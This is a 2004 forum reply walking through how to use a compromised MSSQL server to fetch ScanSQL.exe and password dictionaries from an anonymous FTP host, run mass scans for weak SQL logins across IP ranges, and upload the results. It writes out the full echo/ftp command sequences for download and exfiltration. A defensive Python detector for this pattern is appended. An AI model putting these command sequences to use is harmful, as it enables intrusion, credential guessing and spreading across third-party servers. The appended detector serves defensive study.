July 4th, 2004, 01:07 AM
#6
Seems to be a remote scanner thingy.
Remote Scanning of SQL:
Remote scanning of SQL is no different from that of the 21 (see this PAGE). Only the script (the order of execution given to the SQL) and the logs used differ. In this process Tscan.exe and Kill.exe are not used, but:
ScanSQL.exe: the scanner.
SQLpass.dic: the password library.
Dict.txt: the username library.
Apart from that and the script, the technique is identical. You need a 21 IP with anonymous access and root (dir: ->Example<- ), and a SQL that has "FTP.exe" present on it. Here is how it goes:
(for the example we will take the IP of the 21 as 0.0.0.0)
Once everything is placed on the ftp, connect to the SQL via SQLExec (here).
1: the SQL address - 2: the username - 3: the password - 4: the format, which is specific to each SQL - 5: CMD, where the command lines are returned
Here are the command lines to return in 5 CMD:
echo open 0.0.0.0 21> %windir%\system32\filepage.sys
echo user anonymous [email protected] >> %windir%\system32\filepage.sys
echo get scansql.exe >> %windir%\system32\filepage.sys
echo get sqlpass.dic >> %windir%\system32\filepage.sys
echo get dict.txt >> %windir%\system32\filepage.sys
echo quit >> %windir%\system32\filepage.sys
type %windir%\system32\filepage.sys
ftp -i -n -v -s:%windir%\system32\filepage.sys
There will probably be error messages of the type SQL_ERROR or SQL_NO_DATA, which is normal.
But if, with the type command on "%windir%\system32\filepage.sys", nothing is displayed in the main window, then it will be necessary to change the Format (4) and start again until it is right.
SQLExec will block on the command "ftp -i -n -v -s:%windir%\system32\filepage.sys", which is normal; it will be released at the end of the transfer of the 4 files from the 21 to the SQL. If all went well the SQL is ready to start the scanner, but as a precaution it is imperative to check that everything is there. Here are the check commands:
dir scansql.exe
dir scansql.txt
dir sqlpass.dic
dir dict.txt
If files are missing, start the transfer procedure again. If you look at the command lines carefully, it will not be necessary to redo everything, just what is needed for what is missing. Once done, check again.
If everything is on the SQL, here is the command line to launch the scan:
scansql x.x.x.x y.y.y.y 200
"x" represents the starting IP of the scan, and "y" the ending IP of the scan. 200 is the number of threads (the number of IPs scanned simultaneously).
Retrieving the results of the Remote Scanning:
It is preferable to check and/or retrieve the results approximately every 24h. For that you will need to be connected to the SQL and to return the following command in (5) CMD to see the results file:
dir scansql.txt
If the file scansql.txt has a size of 0, either the scan has stopped or it did not find a SQL. If the file has a size, it is enough to transfer it from the SQL to the 21 in order to retrieve it. Here are the command lines:
echo open 0.0.0.0 21> %windir%\system32\filepage.sys
echo user anonymous [email protected]>>%windir%\system32\filepage.sys
echo put scansql.txt >> %windir%\system32\filepage.sys
echo quit >> %windir%\system32\filepage.sys
type %windir%\system32\filepage.sys
ftp -i -n -v -s:%windir%\system32\filepage.sys
It should be known that the passwords in the library are those which are commonly used. The fear of forgetting creates a convenience.
Sqlscan.exe is a trojan.
Hope this is what you were looking for.....
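From a defender's side, the procedure above leaves a distinctive footprint: a text ftp script written under %windir%\system32 with a .sys name, then ftp.exe run with -s: from a shell that the database server spawned. The following is an added example, not code from the post or from any of the tools it names; it flags those traits in constructed process-creation log lines, whose pipe-separated layout and sqlservr.exe parent image are assumptions.

```python
import re

# Constructed sample process-creation events (not from the post).
# Assumed layout: timestamp|parent_image|image|command_line
SAMPLE_LOG = """\
2004-07-04T01:05:00|C:\\MSSQL\\Binn\\sqlservr.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe /c echo open 0.0.0.0 21> %windir%\\system32\\filepage.sys
2004-07-04T01:05:01|C:\\MSSQL\\Binn\\sqlservr.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe /c echo get scansql.exe >> %windir%\\system32\\filepage.sys
2004-07-04T01:05:02|C:\\MSSQL\\Binn\\sqlservr.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe /c ftp -i -n -v -s:%windir%\\system32\\filepage.sys
2004-07-04T01:05:03|C:\\MSSQL\\Binn\\sqlservr.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe /c dir scansql.txt
2004-07-04T01:06:00|C:\\WINNT\\explorer.exe|C:\\WINNT\\system32\\ftp.exe|ftp files.example.test
2004-07-04T01:06:30|C:\\WINNT\\explorer.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe /c echo hello > C:\\temp\\notes.txt
"""

# Shell redirection writing text into a .sys name under system32: a driver directory is no place for an ftp script.
SYS_DROP = re.compile(r">>?\s*\S*system32\\[^\s\\]+\.sys\b", re.IGNORECASE)
# ftp.exe driven by a script file (-s:) instead of an interactive session.
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.IGNORECASE)
DB_PARENTS, SHELL_OR_FTP = {"sqlservr.exe"}, {"cmd.exe", "ftp.exe"}  # a DB server has no reason to spawn these

def parse_events(text):
    """Split 'ts|parent|image|cmd' lines; image paths reduced to lower-case basenames."""
    base = lambda p: p.rsplit("\\", 1)[-1].lower()
    rows = (line.split("|", 3) for line in text.splitlines() if line.strip())
    return [{"ts": t, "parent": base(p), "image": base(i), "cmd": c} for t, p, i, c in rows]

def tag_event(ev):
    """Suspicious traits of one event; empty list when it looks benign."""
    checks = [
        ("db_spawned_shell", ev["parent"] in DB_PARENTS and ev["image"] in SHELL_OR_FTP),
        ("text_written_to_system32_sys", bool(SYS_DROP.search(ev["cmd"]))),
        ("ftp_scripted_session", bool(FTP_SCRIPT.search(ev["cmd"]))),
    ]
    return [tag for tag, hit in checks if hit]

def detect(text):
    """One finding per tagged event; 'high' when a DB-spawned shell also drops or runs the script."""
    findings = []
    for ev in parse_events(text):
        tags = tag_event(ev)
        if tags:
            high = "db_spawned_shell" in tags and len(tags) > 1
            findings.append({"ts": ev["ts"], "parent": ev["parent"], "tags": tags, "severity": "high" if high else "medium"})
    return findings

def chained_parents(findings):
    """Parents seen both writing the script and running ftp from it: the complete pattern, not a lone hit."""
    drops = {f["parent"] for f in findings if "text_written_to_system32_sys" in f["tags"]}
    runs = {f["parent"] for f in findings if "ftp_scripted_session" in f["tags"]}
    return drops & runs
```

A lone `dir` from the database server's shell only scores medium; the script drop followed by the scripted ftp run from the same parent is what `chained_parents` reports.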